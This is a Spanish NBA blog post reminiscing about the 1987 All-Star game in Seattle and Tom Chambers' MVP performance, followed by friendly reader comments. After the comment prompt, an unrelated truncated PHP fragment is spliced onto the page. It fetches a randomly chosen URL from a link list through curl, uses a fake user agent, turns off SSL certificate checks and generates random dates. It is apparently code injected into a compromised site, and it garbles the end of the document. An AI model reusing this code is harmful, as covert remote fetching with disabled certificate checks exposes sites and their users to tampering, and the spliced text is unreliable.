Partidos históricos: All Star Seattle 1987

26 de September de 2011 por TheDeerHunter

A estas alturas del año lo normal en TJNBA sería estar preparando nuestros tradicionales análisis pre-temporada. Por desgracia, de momento, eso no va a suceder y en algo tenemos que centrar nuestra atención para prevenir el síndrome de abstinencia que sin lugar a dudas sufriremos en caso de cierre patronal más prolongado de la cuenta.

Gracias a una excelente sugerencia de un visitante, hoy inauguraremos nueva sección: Los mejores partidos de la historia. O dicho de otro modo: historias viejunas de los abuelos cebolleta de TJNBA.

Comenzaremos por uno muy especial, con ciertas particularidades que podrían incumplir el criterio que nos ocupa, pero para el que escribe tiene un inmenso significado.

Os pongo en antecedentes. Año 1989 y yo era un jugoncete de 13 años mejor dotado para manejar un mando de videoconsola que para hacer mates o clavar triples. Un año después del inicio del mítico “Cerca de las estrellas” y del aterrizaje de la NBA en España cae en mis manos el juego “Lakers vs Celtics” donde por primera vez en mi vida podía ponerme en la piel de mi gran ídolo: Magic Johnson. Pero cuidado porque no vengo a hablar de él, sino de otro tipo:

Pues sí. Había en aquellos Suns un interor blanco, desconocido para mí, llamado Tom Chambers que era prácticamente imparable. Capaz, como se puede observar de anotar de todos los colores, incluyendo un tipo imposible de mate, a dos manos con rectificado, en el que literalmente volaba en cuanto tocaba la zona tuviera o no defensores delante.

El caso es que, en aquella oscura época en el que no existía Internet, la curiosidad por ese jugador desconocido llegó a convertirse en obsesión. Tras no pocos esfuerzos en aquella particular investigación sobre ese tipo no puedo recordar cómo encontré un partido que no habíamos podido ver en directo en estas tierras: All Star 1987 en Seattle. La noche en el que Tom Chambers fue el rey del mundo.

En las “Reflexiones sobre la bocina” suele haber bastante cachondeito con los all-stars, pero si repasamos los elegidos para aquella “pachanga” a cualquiera con una mínima sensibilidad sobre el tema le goteará el colmillo (u otra cosa):

Entre otros: Magic, Worthy, Jabbar, Olajuwon, English, Aguirre, Blackman… frente a Jordan, Erving, Bird, Dominique, Isiah, Moses, Barkley, Laimbeer, McHale, Parish… casi nada. Chalmers, estrella local, entraría de rebote en el Oeste, en sustitución de un Ralph Sampson (cómo no) lesionado.

Aunque lo intentara no podría transmitir las sensaciones de aquella retransmisión desde los ojos de un chaval que no sabía ni de la misa a la mitad sobre lo que tenía delante:

Magic en plenitud (temporada de MVP) y en su salsa, totalmente dedicado a la distribución porque la situación lo permitía. Puro circo y pura magia, con Worthy y Rolando de intérpretes a la altura que exigía el recital. Pero Magic cocinó el plato adecuado para aquel escenario y aquel momento. Chambers, jugador de los Sonics entonces, iba a ser MVP por su santa voluntad, para extasis del público local.

En frente un combinado Este increíble (y favorito) muy escasamente predispuestos a hacer regalitos ni a Magic, ni mucho menos a un Chambers “de prestado” en el que iba a ser partido de despedida del Doctor J de ese tipo de eventos. Aquí podemos vislumbrar el nivel de Moses Malone en modo “perro grande”, Isiah  moviendo a esos tres aleros míticos que tenía al lado y a Jordan aún muy joven, empezando a hacerse hueco entre las estrellas.

Decir que hubo prórroga en este contexto debería ser lo de menos, aunque habrá quién lo considere malo. El 154 a 149 con el que ganó el Oeste es indicativo que pudo ser un circo, como todos, pero hay que tener en cuenta detalles como que un defensor excelso como Olajuwon terminara expulsado por faltas o alguna acción defensiva que aparece en el vídeo y se describe por si misma.

El partido lo tiene todo para resultar delicioso. Evidentemente le falta la presión dramática que supone un título por medio, pero la competitividad no se resiente tanto como cabría esperar. Parte de circo indudablemente hubo, pero entendido de la mejor forma. Magia, ilusión y asombro basado todo en un talento deslumbrante e irrepetible. La búsqueda de la belleza y de la poesía a la que este espectáculo siempre debe aspirar, haya lo que haya en juego. Si se pierde eso se pierde todo.

Al chaval que vio aquella “pachanga” le ganaron para siempre y de forma casi ingenua uno siempre aspira a volver a repetir algo así. Por eso algunos seguimos fieles al evento, para bien o para mal, y si lo pensamos bien de vez en cuando todavía nos llevamos alguna satisfacción. Merece la pena intentarlo.

Por cierto, ya que nos ponemos, los concursos de mates y de triples de aquel año también son canela fina. Aviso.

Comenta

21 comentarios a esta entrada

  1. max dice:
    #1

    Que tiempos… Me acuerdo perfectamente de ese All-Stars y de cómo Chambers llegó de rebote y fue el MVP. No ví el partido pero ya seguia la NBA en esa época (yo tenía dieciocho) y me impresionó que un tio que no había oído nombrar nunca fuera el mejor, en medio de Magic, Jordan y demás… Que bueno!!

      Citar

  2. HisRoyalAirness dice:
    #2

    Partido tremendo. Yo lo vi ya mayor, que me pilló un poco jovenzuelo pero el encanto de los all-star de los 80 es incomparable, vaya equipazos.
    Me encanta esta idea de partidos míticos!!

      Citar

  3. Sancho88 dice:
    #3

    Yo soy del 88, ese día no era ni cigoto. jjjeje.
    Muy buenas las highlights. Me ha encantado ver a James Worthy, con un reverso imposible en la línea de fondo y bandeja a la remanguillé, y luego un vuelo sin motor para machacar, a Jabbar clavándola a una mano, y la entrada de Chambers me ha recordado a la del título del Caja Laboral el año pasado con San Eme liándola parda y acabando en bandeja.

    Buena idea la de los partidos históricos. Supongo que aquí comenzará toda una serie, un clinic, de Boston contra Lakers. A ver si nos seguís sorprendiendo y no sacáis la típica final de Reed cojo y cosas así, que solamente de tantas veces como lo ponían en los anuncios de los descansos el año pasado… le cogí hasta tirria a algunas de esas acciones.

      Citar

  4. HisRoyalAirness dice:
    #4

    Sancho88, hay un artículo buenísimo sobre la final de Reed en el blog de Gonzalo Vázquez. Merece la pena.

    No sé si se pueden poner enlaces externos, espero que no haya problema http://blogs.acb.com/blog/elpuntog/post/misterioso-brillo-afilado

      Citar

  5. Sancho88 dice:
    #5

    ejeje, tranquilo, está en mi lista de blogs y me leo todas sus historias. Esa también me la leí. Muy muy buena también, no sé si la publicó el, pero yo creo que si, la del puñetazo de Washington a Tomjanovich. La verdad que casi todo lo que publica en punto g es muy bueno. Para mí es un referente. Lo único que me parece que se fue a Nueva York a aprender inglés y no consigue hacerlo, el pobre. Bueno, no sé como andarán sus andanzas ahora, pero al principio decía que solo hablaba con los jugadores latinos y cosas así, que se sentía frustradísimo.

    Por lo demás, ojalá que un día nos despertemos todos y salga en tjnba un artículo diciendo… así está el este, análisis de la división central. Y que sea a finales de este mes y el lockout sea solo una mala pesadilla. Está difcíil, pero en un arriesgado ejercicio de probabilidades, vosotros que esperanzas teneis de que comience la temporada a finales de octubre? Mis esperanzas no llegan ni al 10%. Como andan las vuestras?

      Citar

  6. HisRoyalAirness dice:
    #6

    Yo tengo bastantes esperanzas de que la temporada empiece; se están moderando mucho en el discurso ambas partes y son perfectamente conscientes de que a nadie le interesa la mala imagen que daría un segundo lockout en 15 años; el precedente en cuanto a pérdida de espectadores (ergo de publicidad, ergo de pasta) es nefasto.

    Pues Gonzalo Vazquez no sé dónde se mete, terminaron las Finales y desapareció del mapa, incluso abandonó el twitter y eso que era uno de los más activos

      Citar

  7. Nacho dice:
    #7

    Bueno, parece que sigo siendo el más viejo, pero ya llueve menos. Algunos estáis más cerca. Mirad, yo el partido, como que ni fu ni fa, por aquella época, para mí el baloncesto era Drazen Petrovic, bueno vale, y Celtics Lakers que veíamos en TVE a deshora, como siempre. Pero lo mejor del artículo, sin lugar a dudas ES EL PUTO VIDEO DEL VIDEOJUEGO. ¡¡¡¡JODER!!!! PUES NO ME ECHABA YO PARTIDAS EN LA MIERDA DE PC’s DE AQUELLOS TIEMPOS, CON EL PUTO PIIIIIIIIIIIIII PARA CARGAR EL JUEGO. JUGABA SIEMPRE CON LOS AMARILLOS O CON LOS SONICS, MÍTICOS A MEDIADOS DE LOS 80. ESO SÍ, SIEMPRE CONTRA McHALE, BIRD Y COMPAÑÍA (PARA MÍ ERAN COMO EL MADRID) ¡¡¡¡¡¡¡JODER!!!!! ESO SÍ QUE ME HA TRAIDO RECUERDOS, GRACIAS DEER.
    Por otro lado, acabo de darme cuenta de por qué no puedo con Stat, e una copia mala de Worthy.

      Citar

  8. HisRoyalAirness dice:
    #8

    Stat? Stoudamire? Pero si son jugadores completamente diferentes! Un 3 y un 4.
    Worthy es un Lebron (por decirlo de alguna manera) y Stoudamire es, simplemente, un mediocre y una madre en defensa.
    Worthy MVP de las Finales del 98, Stoudamire en su vida va a serlo (sí, yo tampoco lo trago, es evidente)

      Citar

  9. HisRoyalAirness dice:
    #9

    Finales del 88, of course

      Citar

  10. TheDeerHunter dice:
    #10

    Jejeje, qué mala leche tenéis. Fíjate que uno de los partidos que teníamos en mente era ese de los Knicks…
    De momento se quedará aparcado, porque entre otras cosas nos pilla demasiado lejos. Pero que conste que algún día convendría hablar de él, porque bajo mi punto de vista está seriamente mitificado.
    Se habla mucho de lo que hizo Reed (que fue un sacrificio muy grande y muy épico) pero muy poco del partidazo que se marcó Walt Frazier, para empezar.
    Reed tampoco contribuyó apenas en la victoria en el 5º, así que yo diría que todo eso del espíritu Reed en el último es un poco bacalá, sin pretender quitarle un ápice de brillo a la maravilla de serie que debió ser.
    Los Lakers perdieron porque quitando ese Big Three monstruoso que tenían (con Baylor al borde de la jubilación, no lo olvidemos) poco más podían poner sobre la mesa. Y los Knicks, a parte de Reed y Frazier, tenían a Bradley, Debusschere y unos cuantos más que hacían una producción más que digna.

    Y Nacho, menudos recuerdos el juego de marras. Pero ahora lo vemos y es para sacarse los ojos!!! Ahora alguien me hace un mate como los que le dejaban hacer a Chambers y tiro el juego por la ventana, te lo juro!!!

      Citar

  11. TheDeerHunter dice:
    #11

    Por cierto… .¿Worthy – Stoudemire??? ¿Pero qué me estáis contando???

      Citar

  12. Alex Espinosa dice:
    #12

    Me alegro mucho que una seccion haya surgido de una idea mia, yo que os sigo desde la aplicacion del movil, es un placer leer en cualquier parte articulos tan buenos. Gracias a todos, por seguir dando ideas, me gustaria comentaros que les parece una seccion de 1vs1 quien ganaria? pero jugadores de una misma epoca, por aquello de comparar a Kobe y Jordan, etc..pero como veais, es una simple idea, yo la dejo en el aird. Saludos a todos los amantes fieles a este deporte.

      Citar

  13. Nacho dice:
    #13

    Lo de Worthy-Stoudemire ha sido porque en el video he visto un movimiento de Worthy, que lo he visto en Stat alguna vez, obviamente ni punto de comparación, y por meterme un poco con el de NY que no puedo con él.

      Citar

  14. HisRoyalAirness dice:
    #14

    Nacho me tienes que decir cuál es el movimiento de Stat que te recuerda a Worthy; yo, como no sea el movimiento para levantarse del banquillo no lo veo (no estoy de coña, dime a cual te refieres, please).

    Estoy con Deer en lo de Reed; está claro que la historia personal se ha vendido por encima del rendimiento pero supongo que también es parte del negocio. Yo vi los 2 últimos partidos hace tiempo y lo del espíritu en el último es una gilipollez.

    Alex, creo que si veo otra comparativa Jordan-Kobe me voy a suicidar jaja.

    Por cierto, para actuación épica, lo más grande que mis ojos han visto es Magic de rookie, con Kareem lesionado, en el sexto partido contra los Sixers del Dr. J en el Spectrum y el angelito empieza de center y se casca 42 puntos, 15 rebotes, 7 asistencias y 3 robos. Demencial

      Citar

  15. Nacho dice:
    #15

    Igual son las gafas

      Citar

  16. HisRoyalAirness dice:
    #16

    jajajajajajajajaja

      Citar

  17. Sancho88 dice:
    #17

    Vuelvo a recordar mis años de cigoto, jeje, y es una ofensa que participe en debates de los años 80, pero joder, yo solo vi a Magic Johnson jugando un partido amistoso contra el Real Madrid más lamentable de la historia (meek, tarlac, mulaomerovic, vukcevic, attruia, etc). Tenía Magic 40 y muchos tacos y se los f…olló vivos. Así que me imagino las barbaridades que debía hacer antes de ser portador

      Citar

  18. Viru dice:
    #18

    Aquí otro fan total de Tom Chambers.. en los siguientes juegos de Megadrive que le pusieron hacía un mate igual, imparable y de un larguísimo salto. Que TITÁN que era el bueno de Chambers.

      Citar

  19. TheDeerHunter dice:
    #19

      Citar

  20. Jairo dice:
    #20

    Ese All-Star, el del 87, lo pusieron en televisión quizás al día siguiente de jugarse o poco después. Es mi primer recuerdo de la NBA y creo que fue el primer partido NBA que se pasaba en España.

    Luego, en el 88, comenzó Cerca de las Estrellas con Trecet.

      Citar

  21. Barkley dice:
    #21

    Jajajaja… Sancho, eso fue al principio por lo visto. Luego ha seguido con la serie La Unidad hasta las finales en junio. Una pasada de serie… a mí casi me gustan más sus aventuras que El punto G y la ultima pagina dela revista.

    Gran entrada TJ.
    😉

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>